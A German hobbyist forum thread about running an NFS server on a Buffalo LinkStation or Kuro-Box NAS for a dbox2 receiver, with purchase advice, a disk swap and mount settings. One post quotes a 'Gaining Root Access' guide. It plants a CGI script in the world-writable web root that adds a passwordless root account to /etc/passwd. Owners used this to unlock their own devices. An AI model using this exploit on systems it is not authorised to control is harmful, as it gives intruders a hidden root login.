NFS Server für Kuro-Box

Network Attached Storage
GuidoL
Einsteiger
Einsteiger
Beiträge: 102
Registriert: Sonntag 6. Oktober 2002, 19:52

Beitrag von GuidoL »

petgun hat geschrieben:PS:Ich bleibe erst mal bei der offiziellen Version....die Kuro-Box hat auch nur eine USB-Schnittstelle im Gegensatz zur Linkstation mit 2 Anschluessen...oder werden die auch mit der Kuro Box Firmware unterstuetzt? Kannst Du den Betreff dieses Thread's evtl. in 'NFS-Server für Kuro-Box/Linkstation' aendern damit ich hier nicht so OT bin ;-)
So nun hast Du es geschafft...nachdem ich Deine Beitraege und auch einige Seiten zur Linkstation/KuroBox gelesen habe bin ich auch zu neugierig geworden :-))

Da mir ein externer USB-Port zu wenig war, ich aber lieber eine Kuro-Box wollte, hab ich mal eben USD in EUR umgerechnet und gemerkt, dass selbst mit dem teueren Porto die Kuro-Box/HG nicht soo wesentlich teuerer ist als eine Linkstation...OK sind ca. 50EUR + man muss noch eine Festplatte zurechnen...die hab ich aber da.

Dafuer hat man dann auch 2 USB Ports, bekommt nochmal 64MB Ram dazu und auch 66Mhz mehr :-)) ...ach ja und anstatt 10/100er EtherNet geht auch 1000er (Gigabit).

SO...nun muesste ich es nur verguenstigen durch den Verkauf meines SUN Cobalt Qube 2 (64MB Ram 40Gb Platte und Soundkarte) auf dem schon debian installiert ist (fuer die MIPS CPU)....

Da es fuer debian auch genug Pakete gibt, koennte sich daraus sicher auch jemand leicht ein NAS machen.... die CPU hat ueber 200Mhz und die Kiste hat glaub 2*100MBit Ethernet und 1x RS232

Gruesse
Guido.
Philips-SAT 2XI AVIA600 VB028 UCode0014
BaseImg 1.7.1 / cdk.cramfs SnapShot 03.01.04 AlexW
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

hi,
GuidoL hat geschrieben:Da mir ein externer USB-Port zu wenig war, ich aber lieber eine Kuro-Box wollte, hab ich mal eben USD in EUR umgerechnet und gemerkt, dass selbst mit dem teueren Porto die Kuro-Box/HG nicht soo wesentlich teuerer ist als eine Linkstation...
...wo bekommst Du denn hier in Europa eine KuroBox HG und zu welchem Preis?
Ich bin nur gespannt ob die 66 MHz mehr und die GBit-Schnittstelle wirklich was praxisrelevantes in einem 100er Netz bringen...ich glaube nicht! Fuer lau kannst Du eine Linkstation (mit den zwei USB 2.0 Ports) in eine KuroBox umwandeln...aber das ist Dir ja bekannt.

cu,
peter
GuidoL
Einsteiger
Einsteiger
Beiträge: 102
Registriert: Sonntag 6. Oktober 2002, 19:52

Beitrag von GuidoL »

petgun hat geschrieben: ...wo bekommst Du denn hier in Europa eine KuroBox HG und zu welchem Preis?
Ich bin nur gespannt ob die 66 MHz mehr und die GBit-Schnittstelle wirklich was praxisrelevantes in einem 100er Netz bringen...ich glaube nicht! Fuer lau kannst Du eine Linkstation (mit den zwei USB 2.0 Ports) in eine KuroBox umwandeln...aber das ist Dir ja bekannt.
wieso Europa :-))
Was meinst Du warum das Porto so hoch ist (ca. 45 Dollar).
Ich hab die direkt beim Hersteller bestellt
https://www.revolutionstore.com/revogea ... roductID=2
und die Bezahlung geht ueber PayPal.
Der Dollarkurs ist um die 1,28 d.h. 285/1.28 ca. 222-224EUR
(mal sehen ob der Zoll nachtraeglich noch was will)

Umwandeln mochte ich nicht wg der 64MB der Linkstation. So wie ich die Auslastung meines Cobalt Qube mit 64Mb sehe, wollt ich noch ein wenig Platz im Ram...da kommen die 128Mb gut :-)

Ich denk die 66Mhz und das Gigabit zeigt sich auch erst wenn mal weitere Geraete bei mir Gigabit haben...dann koennten die 66Mhz noch ein wenig die CPU entlasten...ansonsten soll ja Audio ueber USB gehen. Und wenn der da z.B. Daten rechnet ist er nicht so ausgelastet...MP3 braucht auf meinem Qube nur 23%.....so ein InterNetRadio auf der Kuro laufend faend ich auch gut :-)) Koennt ich mit dem Griffin iMic meines Apple Cube testen.

Muss heut Abend wohl mal den Cobalt Qube in die Newsgroups zum Verkauf setzen.

Gruesse
Guido.
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

GuidoL hat geschrieben:Muss heut Abend wohl mal den Cobalt Qube in die Newsgroups zum Verkauf setzen..
?? sowas verkauft man doch nicht...was soll der denn bringen/hat er mal gekostet/hast Du dafuer bezahlt?
GuidoL
Einsteiger
Einsteiger
Beiträge: 102
Registriert: Sonntag 6. Oktober 2002, 19:52

Beitrag von GuidoL »

petgun hat geschrieben:
GuidoL hat geschrieben:Muss heut Abend wohl mal den Cobalt Qube in die Newsgroups zum Verkauf setzen..
?? sowas verkauft man doch nicht...was soll der denn bringen/hat er mal gekostet/hast Du dafuer bezahlt?
Er soll noch 135EUR + Porto bringen.
Ist fast neu, da ich ihn fuer 158EUR neu und org. verpackt bekommen habe.
Gelaufen ist er bei mir etwa 200 Stunden und in der Zeit hatte ich die
20GB Platte gegen eine leise kuehele Samsung SV0411N 40GB
ausgetauscht.

Hat keine Kratzer...ist echt ein huebscher kleiner Server.

*EDIT* Ist weg :-)) 30Minuten nach Eintrag in die Newsgroup war er verkauft.


Gruesse
Guido.
Zuletzt geändert von GuidoL am Donnerstag 3. März 2005, 09:35, insgesamt 1-mal geändert.
Philips-SAT 2XI AVIA600 VB028 UCode0014
BaseImg 1.7.1 / cdk.cramfs SnapShot 03.01.04 AlexW
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

hmm...so ein Teil hat doch mal >2000$ gekostet, oder?

Bild

nee, den wuerde ich behalten! Alle die mit Eisfair Gedanken/oder aehnlichem schwanger gehen, sollten imho da mal einen Blick drauf werfen....

@Admin/Mod
..sorry fuer OT..kannst Du den Cobalt-Kram bitte abtrennen >> Trash/Labertasche/??? verschieben...
alux
Interessierter
Interessierter
Beiträge: 27
Registriert: Donnerstag 19. Februar 2004, 22:42

Beitrag von alux »

Hallo petgun,

Ich trage mich mit dem Gedanken eine Linkstation zu kaufen,
als Alternative oder Ergänzung zur WL-HDD.

Habe ich das aus dem Forum richtig entnommen, das
mit der Firmware 1.45 final und der angegebenen Software von
Zaphot (portmaper und nfs v3) die Linkstation auch ohne
Kur-Box Umwandlung mit der dbox2 (Direktaufnahme und Wiedergabe mit Movieplayer) zusammenspielt ?

Wie sieht es mit einer kompakten Installationsbeschreibung für die Linkstation aus ?. (In etwa kann ich mir sie ja aus den Beiträgen selbst
zusammenreimen)

Danke

alux
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

hi,
alux hat geschrieben:Habe ich das aus dem Forum richtig entnommen, das
mit der Firmware 1.45 final und der angegebenen Software von
Zaphot (portmaper und nfs v3) die Linkstation auch ohne
Kur-Box Umwandlung mit der dbox2 (Direktaufnahme und Wiedergabe mit Movieplayer) zusammenspielt ?
jau, laeuft wie Schmitz Katze
Wie sieht es mit einer kompakten Installationsbeschreibung für die Linkstation aus ?. (In etwa kann ich mir sie ja aus den Beiträgen selbst
zusammenreimen)
..waere gut wenn Du das erst mal den Forumsbeitraegen entnehmen koenntest...muesste alles drinstehen..

Hinweis:
Aktuell wird in USA von einer Hardware Revision 2 mit anderer Firmware (2.04) berichtet...ob das damit klappt weiss ich nicht. Diese Hardware Revision 2 soll angeblich ein groesseres Flash und einen Mini PCI Slot haben...zB. fuer eine zusaetzliche WLAN-Karte. Also wenn Du keine Eile hast, wuerde ich das mal abwarten...das ist ein echter Mehrwert mit vielen weiteren Moeglichkeiten.
<edit>
..kann sein dass das mit der FW 2.04 und der geaenderten Hardware nur heisse amerikanische Luft ist...
</edit>

cu,
peter
Zuletzt geändert von petgun am Freitag 4. März 2005, 19:53, insgesamt 1-mal geändert.
leunam25

Beitrag von leunam25 »

Hallo zusammen,
bin jetzt nach langer suche nach dem richtigen NAS System, zu dem Schluß gekommen, mir auch die Linksatdion zuzulegen.
Hätte jedoch an euch, da ihr sie ja schon im Gebrauch habt, noch ein paar Fragen. :gruebel:
1. Kann man auf die Platte in der Stadion auch ganz normal mit Win XP zugreifen ohne Zusatztools???? Sprich über die Netzwerkumgebung???
2. Welches Dateisystem hat die Platte ???? (ext3 ????)
3. Da die Platte 3 Partitonen hat, ist es auch möglich nur eine partition zu erstellen, oder zumindest die göße der partitionen zu ändern???
4. Ist das OS System auf der Platte, oder in der der Stadion selber.
5. Wie ist es möglich die Stadion in den Standby zu schicken/aufwachen, bzw komplett aus-/einzuschalten ohne den Netzschalte zu betätigen???
6. Wie flasht man die Firmware eigentlich??? Ist dazu Linux nötig???
7. Braucht man für den Betrieb einen Router, oder reicht da ein normaler Switch, bzw, kann man sie auch über crossover direkt verbinden ???
8. Bis wann kann man den ungefähr mit einer kompletten Anleitung rechnen, da es für mich als "unwissender NIXLINUXKÖNNER" :gruebel: sehr schwer ist, sich durch die einzelnen Threats zu wurschteln.

Echt toll, was mit Linux und der DBOX2 alles so geht.
Macht weiter Jungs :wink:
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

leunam25 hat geschrieben: 1. Kann man auf die Platte in der Stadion auch ganz normal mit Win XP zugreifen ohne Zusatztools???? Sprich über die Netzwerkumgebung???
ja
2. Welches Dateisystem hat die Platte ???? (ext3 ????)
ext3
3. Da die Platte 3 Partitonen hat, ist es auch möglich nur eine partition zu erstellen, oder zumindest die göße der partitionen zu ändern???
keine Ahnung
4. Ist das OS System auf der Platte, oder in der der Stadion selber.
auf der Platte (Systempartition)
5. Wie ist es möglich die Stadion in den Standby zu schicken/aufwachen, bzw komplett aus-/einzuschalten ohne den Netzschalte zu betätigen???
afaik nur ueber einen Zeitplan...WOL geht nicht.
6. Wie flasht man die Firmware eigentlich??? Ist dazu Linux nötig???
nein. bei der Firmware ist ein Tool dabei.
7. Braucht man für den Betrieb einen Router, oder reicht da ein normaler Switch, bzw, kann man sie auch über crossover direkt verbinden ???
nein,ja,ja
8. Bis wann kann man den ungefähr mit einer kompletten Anleitung rechnen, da es für mich als "unwissender NIXLINUXKÖNNER" :gruebel: sehr schwer ist, sich durch die einzelnen Threats zu wurschteln.
Du brauchst Dich 'nur' durch diesen Thread hier zu wurschteln..

cu,
peter
leunam25

Beitrag von leunam25 »

ok, vielen Dank schonmal.
Werde dann mal eine bestellen, und mein Glück versuchen.
Ihr steht mir ja siche jederzeit für Fragen zu Verfügung falls es widererwartend net so hinhauen sollte :wink:

CU :roll:
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

Hi,
...ich habe alle Dateien (mit init-Script, portmapper usw.) die man fuer den unfs3 braucht in ein *.tar gepackt. Es muss nur noch entpackt und die exports angepasst werden, dann die Linkstation neu starten und gut ist :-) Waere nett wenn das einer hosten koennte.....bis dahin koennen mir die Leute die das haben wollen eine PN mit EmailAddi schicken...sind _nur_ 610KB.
Bei dieser Gelegenheit nochmal danke an zaphot!

BTW habe ich diese Nacht versucht eine groessere Platte einzubauen...mechanisch habe ich das ohne grosse Spuren an der Linkstation geschafft (war trotz Anleitung etwas fummelig), aber leider fehlt mir der Plan wie die Platte vorher/nachher zu behandeln ist....es geht wohl nur ueber den Einbau in ein vorhandenes Linux-System/USB-Platte>>formatieren>>mounten>>kopieren?? mit anlegen von drei Partitionen usw.....

Nachtrag:Der Plattentausch hat jetzt doch mit dem Flash-Tool was bei der 1.45'er Firmware dabei war funktioniert...Linkstation _muss_ anscheinend direkt am PC haengen..also PC vorher zB. die Adresse 192.168.11.151 verpassen..(LS-IP wird auf 192.168.11.150 zurueckgesetzt)
Jetzt habe ich also eine 250'er Linkstation und das oben erwaehnte Paket hat auch sofort funktioniert...damit schafft das jetzt auch jeder Linux-Rookie :-)

cu,
peter

PS:Entwickler die immer noch nicht davon ueberzeugt sind, das die Linkstation das ideale Teil/Ergaenzung/Spielzeug nicht nur fuer die Box ist, sollten sich vielleicht hier mal umschauen..und auch mal auf link klicken...

--
Buffalo Linkstation ------ Streamen bis der Arzt kommt
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

hi,
wer kann das unfsd Paket fuer die Linkstation auch langfristig hosten? Bevor das im Wiki verlinkt wird sollte das imo gesichert sein.

cu,
peter

PS:...bitte schickt mir erst dann eine PN mit eurer EMail Adresse fuer das Paket wenn ihr Root Access habt...

Code: Alles auswählen

Gaining Root Access 

You will first need to gain root access on your LinkStation. This works if you have either firmware version 1.44_11 or 1.45_13 installed. Here are the steps (assuming that the LinkStation? is located at IP address 192.168.1.100) 


On the PC, open up the browser window and create an account on the LinkStation? using the web-based adminstration interface. Point your browser to http://192.168.1.100. Under Security and Shared Folder Setup, create a user user1. 


Open a telnet window on your PC 
telnet 192.168.1.100, login with user1 using the password just created. 
cat /etc/linkstation_release to confirm the version and release history 
cat /etc/thttpd.conf to confirm the webserver setting 
            user1@LINKSTATION:/etc# cat thttpd.conf 
            dir=/www user=root 
            logfile=/var/log/thttpd.log 
            pidfile=/var/run/thttpd.pid 
            port=80 charset= 
            cgipat=/cgi-bin*/* 
            root@LINKSTATION:/etc# 


Checking the webserver document root (/www) shows that the directory is world writable, the http server is run as root and the cgipath contains a wildcard in the directory name. 
            root@LINKSTATION:/etc# ls -ald /www 
            drwxrwxrwx 9 root root 1024 Oct 9 12:43 /www 
            root@LINKSTATION:/etc# 


Create a directory and a file to exploit this vulnerability 
            mkdir /www/cgi-bin3 
            echo '#! /bin/sh' > /www/cgi-bin3/breakout.sh 
            echo 'echo "myroot::0:0:root:/root:/bin/bash" >> /etc/passwd' >> /www/cgi-bin3/breakout.sh 


From the telnet window change the file's attributes to allow its execution. 
            chmod a+rx /www/cgi-bin3/breakout.sh 


Point the browser to http://192.168.1.100/cgi-bin3/breakout.sh 
go back to your telnet window and check if the /etc/passwd contains your modification 
login again with telnet, now using myroot as username and no password
<edit>
Link zum Paket hinzugefuegt...wielange das gut geht weiss ich nicht! Und hier die Beschreibung die ich bisher dazu verschickt habe:

Code: Alles auswählen

hi,
packet unfsd.tar einfach auf die Linkstation kopieren. Bei mir heist die Freigabe 'rec' Dann per telnet auf die Linkstation gehen (Rootzugang musst Du allerdings haben...Link fuer die Anleitung gibt's im Forum) und folgendes eingeben:

cd /
cp /mnt/rec/unfsd.tar /my.tar
tar -xf  unfsd.tar
rm unfsd.tar

dann die exports unter /etc/exports auf Deine Beduerfnisse anpassen...meine sieht so aus:

/mnt/rec/Movies/ 192.168.0.4(rw,async,no_root_squash)

wobei 192.168.0.4 die IP der Box ist und 'Movies' der Ordner auf der Linkstation ist, in dem Deine Aufnahmen gespeichert werden..also einen Ordner 'Movies' auf der Linkstation anlegen wenn Du das uebernimmst. Linkstation neu starten und fertig :-)

Auf der Box folgende Mountoptionen einstellen (passend zu der/meiner exports)

.
Verzeichnis/Freigabe /mnt/rec/Movies
lokales Verzeichnis /mnt/filme
.
Mount-Optionen rw,tcp,noatime
Mount-Optionen nolock,rzize=32768,wsize=32768
.

damit klappt es bei mir super. Ich hoffe Du kommst damit klar. Waere nett wenn Du im Forum laut gibst ob/wie es geklappt hat.

Viel Erfolg,
peter
</edit>
Zuletzt geändert von petgun am Sonntag 27. März 2005, 15:47, insgesamt 3-mal geändert.
leunam25

Beitrag von leunam25 »

Hi petgun,
schön das es geklappt hat mit deiner Platte.
Wieviele Partitonen hast du den jetzt???
Hat des System wieder 3 erstellt????
Interessiert mich in soweit, weil was passiert, wenn ich auf der einen
Partiton einen Ordner freigebe und die dann irgendwann voll ist???
Ist des dann dynamisch und schreibt automatisch auf der nächsten Partition weiter, oder muß ich dann wieder nen ordner auf der zweiten Partition erstellen???
Wie läuft des denn dann eigentlich mit usb platten ab???
Reicht es da aus, die in ext3 zu formatieren und einfach dranzuhängen, oder muss man dann auch wieder des System erst draufflashen und 3 Partitionen erstellen???
Wo hast du eigentlich deine LS bestellt????
Würd mir gerne heute eine bestellen, bräuchte nur nen zuverlässigen Lieferanten, net das ich meine Kohle dann gesehen habe.

Mfg Leunam
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

hi,
leunam25 hat geschrieben:Hat des System wieder 3 erstellt...
..sind nur noch 2 Partitionen..eine Systempartition und der Rest fuer die User Shares...alles easy und kann einem als normaler User auch egal sein ob 2 oder 3..man sieht normal nur die Shares auf der Userpartition....ein quota kann man da imo nicht einstellen.
Wo hast du eigentlich deine LS bestellt
...schmeiss den preisroboter.de an...die aktuell preiswerteste Firma mit 175,49 Euro hat mir die Linkstation wie versprochen in 3 Tagen geliefert....geht natuerlich auch per Nachnahme wenn Du moechtest.

cu,
peter
leunam25

Beitrag von leunam25 »

Hi,
ist ja soweit klar, nur meine denke war, wenn man 3 Partitionen mit jeweils ca 40 gig hat, dann kann man in einen ordner ja nur 40 gig reinpacken, und muß dann auf die nächste partition wechseln.
Das wollte ich eigentlich vermeiden mit nur einer partion, auf der alle shares sind.
hast du mal probiert die orginal platte neu zu flashen.
erstellt es dann ach nur 2???
Wie groß ist den die system platte in etwa???
Will ja keinen unnötigen platz verschwenden :wink:
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

...Systempartition ist ca 60MB gross und verschenkt wird nix...sorry, ich verstehe nicht auf was Du hinaus willst...?...eine angeschlossenen USB-Platte steht Dir natuerlich voll zur Verfuegung.
supertroo
Interessierter
Interessierter
Beiträge: 90
Registriert: Dienstag 8. Juli 2003, 21:18

Beitrag von supertroo »

man man man,

ich jeden tag lese ich in diesem forum was anderes, was mich begeister!
gestern wollte ich die frtitbox umbauen, habe mich dann für die wl-hdd entschieden und heute lese ich diesen spannenden thread! danke! nun bin ich wieder unsicher.. :gruebel: :gruebel: :gruebel:

:lol: :lol:

kann denn die linkstation auch bridgen?

usb<->lan
usb<->wlan
lan<->wlan

hmm, 17 Watt habe ich gelesen soll sie verbraten.

hardware fragen:

besitzt sie einen lüfter?
wird sie warm?
wie schnell fährt sie hoch?
kommt da eine 3,5" platte oder eine 2,5" platte hinein?

software fragen:

wie sieht es mit hdparm aus, ist es schon im "standart" packet ergo modifizierte FW dabei?
kann man den lüfter (falls vorhanden) ebenfalls via software regeln?


danke für die antworten im voraus :-)
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

..man o man...der Thread hier heisst 'NFS-Server fuer Kuro-Box'...und wir kommen hier wieder von Hoelzchen auf Stoeckchen. Mach einen neuen Thread mit aussagekraeftigen Subject auf...oder nimm einfach den Thread 'Kaufberatung...' fuer Deine Fragen.
leunam25

Beitrag von leunam25 »

ok, simples beispiel.... 8)
die platte hat 20 gig.
davon sind z.b 2 gig systempartition, und 2 partitionen mit je 9 gig.
jetzt geb ich auf der einen partition einen ordner filme frei und nehme dort hinein etwas auf, das effektiv 12 gig groß ist.
So, jetzt hat die partiton aber bloß 9 gig zur verfügung.
Bricht der stream dann ab, oder wird dynamisch auf die noch freie mit 9 gig weitergeschrieben???
wenn das nämlich net so ist, dann find ich des mit 3 partitionen schlecht von Buffalo gelöst.
Dann ist es mit den 2en (davon 60 mb Systempartition), wie du sie jetzt hast meiner ansicht nach die bessere lösung.
So hätte ich es auch gerne, aber halt mit der orginalen Platte.

P.S. Hab grad nochmal den Threat durchgelesen, seit ihr jetzt eigentlich bei der alten busybox 0.6 geblieben, oder habt ihr auf die neue 1.0er gewechselt???
Für was brauch man des dingens überhaupt???
<<<Wieder mal nixverstehentu>>>> :gruebel:
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

Hi,
sorry, aber ich verstehe auch nix mehr! Die Linkstation hat schon orginal eine Platte eingebaut (min 120GB) von der Du nur die _Shares_ im Netz siehst. Diese Shares kannst Du solange beschreiben bis die Platte voll ist ;-)
Wie kommst Du darauf das 3 40GB-Partitionen angelegt werden? Wenn Du die Firmware flashst geschieht das partitionieren/formatieren vollautomagisch...eine 60MB Systempartition und der Rest in einer Partition fuer den User.
Zusaetzlich angeschlossene USB-Platten haben imo nur eine Partition (ext3 formatiert) von der Du auch wieder nur den/die Shares siehst.

cu,
peter
Zuletzt geändert von petgun am Montag 7. März 2005, 17:13, insgesamt 1-mal geändert.
supertroo
Interessierter
Interessierter
Beiträge: 90
Registriert: Dienstag 8. Juli 2003, 21:18

Beitrag von supertroo »

sorry, habe die kaufebratung durchgelesen. kannte den thread noch nicht. na da wurden soweit alle meine fragen beantwortet.

danke petgun
leunam25

Beitrag von leunam25 »

edit
Zuletzt geändert von leunam25 am Montag 7. März 2005, 17:41, insgesamt 1-mal geändert.
leunam25

Beitrag von leunam25 »

petgun hat geschrieben:Ein Austauschen der Festplatte (mal abgesehen vom Garantieverlust) scheint nicht so einfach zu sein...drei Partitionen...neue einbauen>Weboberflaeche>FormatDisk wird wohl nicht gehen, oder? Gibt's dafuer eine Anleitung?

cu,
peter

Na weil du es mal geschrieben hast.
Was ist nun ne busybox, und welche version habt ihr???

Aber vll sollte ich erstmal warten bis ich des dingens vor augen habe.
Da werden sich dann bestimmt viele fragen von selbst beantworten.
Wollte halt nur net die katze im sack kaufen. :roll:

cya[/quote]
petgun
Tuxboxer
Tuxboxer
Beiträge: 5001
Registriert: Montag 11. November 2002, 15:26

Beitrag von petgun »

Hi,
...ich glaube Du hast einen Tunnelblick...hier im Thread gibt's einen Link dazu wie das Teil geoeffnet wird und auch meine Erfahrung mit dem Austausch/Einbau einer 250'er Platte.
Der Plattentausch hat jetzt doch mit dem Flash-Tool was bei der 1.45'er Firmware dabei war funktioniert
...Wenn Du die Firmware flashst geschieht das partitionieren/formatieren vollautomagisch...
Lies das bitte noch mal durch und frag dann gezielt wenn Du was nicht verstanden hast..vielleicht erst wenn Du Deine Linkstation hast und wirklich vor dem Problem stehst.

cu,
peter

PS:

Code: Alles auswählen

root@BUFFALO:~# df
Filesystem           1k-blocks      Used Available Use% Mounted on
/dev/hda1               373359     86095    267988  25% /
/dev/ram0                 9677       278      8899   4% /mnt2/ram
/dev/hda3            239391140  36067412 203323728  16% /mnt
...die Root Partition ist bei mir also 364MB gross..bleibt 'hda3' fuer den Rest...keine Ahnung ob die Groesse der Platte die Groesse der Rootpartition bei der Initialisierung beeinflusst..die alte Platte habe ich nicht mehr.